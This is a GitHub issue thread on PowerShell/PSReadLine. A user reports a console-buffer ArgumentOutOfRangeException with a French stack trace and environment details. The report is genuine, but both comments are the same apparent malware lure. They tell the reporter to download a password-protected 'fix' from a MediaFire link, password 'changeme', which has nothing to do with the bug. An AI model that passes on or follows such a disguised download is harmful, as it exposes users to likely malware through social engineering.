### ISSUE TITLE
System.ArgumentOutOfRangeException [keycodes error] VSCode

### ISSUE THREAD

**Issue by Math-Vov13** [PowerShell/PSReadLine#4142]
### Prerequisites

- [X] Write a descriptive title.
- [X] Make sure you are able to repro it on the [latest released version](https://www.powershellgallery.com/packages/PSReadLine)
- [X] Search the existing issues, especially the pinned issues.

### Exception report

```console
-----------------------------------------------------------------------
Dernières 92 touches :
 & Space " d : / P y t h o n / D i s c o r d Space L i b / . v e n v / S c r i p t s / p y t h o n . e x 
e " Space " d : / P y t h o n / D i s c o r d Space L i b / b o t / M y A I / M y A I . p y " Enter      


Exception :
System.ArgumentOutOfRangeException: La valeur doit être supérieure ou égale à zéro et inférieure à la taille de la mémoire tampon de la console dans cette dimension.
Nom du paramètre : top
   à System.Console.SetCursorPosition(Int32 left, Int32 top)
   à Microsoft.PowerShell.PSConsoleReadLine.ReallyRender(RenderData renderData, String defaultColor)     
   à Microsoft.PowerShell.PSConsoleReadLine.ForceRender()
   à Microsoft.PowerShell.PSConsoleReadLine.Insert(Char c)
   à Microsoft.PowerShell.PSConsoleReadLine.SelfInsert(Nullable`1 key, Object arg)
   à Microsoft.PowerShell.PSConsoleReadLine.ProcessOneKey(ConsoleKeyInfo key, Dictionary`2 dispatchTable, Boolean ignoreIfNoAction, Object arg)
   à Microsoft.PowerShell.PSConsoleReadLine.InputLoop()
   à Microsoft.PowerShell.PSConsoleReadLine.ReadLine(Runspace runspace, EngineIntrinsics engineIntrinsics)
-----------------------------------------------------------------------
```

### Screenshot

![image](https://github.com/user-attachments/assets/b616399a-b14b-40fd-a25c-33915e7c1334)

### Environment data

```console
PS Version: 5.1.19041.4780
PS HostName: ConsoleHost
PSReadLine Version: 2.0.0-beta2
PSReadLine EditMode: Windows
OS: 10.0.19041.4522 (WinBuild.160101.0800)
BufferWidth: 80
BufferHeight: 14
```

### Steps to reproduce

The program was stuck on a piece of code, so I decided to stop it with ‘Ctrl + C’.
When I ran it again, I got this error...

### Expected behavior

Ran the program without errors.

### Actual behavior

Ran the program with the error above.

Path to launch the program:
`$ "d:/Python/Discord Lib/.venv/Scripts/python.exe" "d:/Python/Discord Lib/bot/MyAI/MyAI.py"`

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
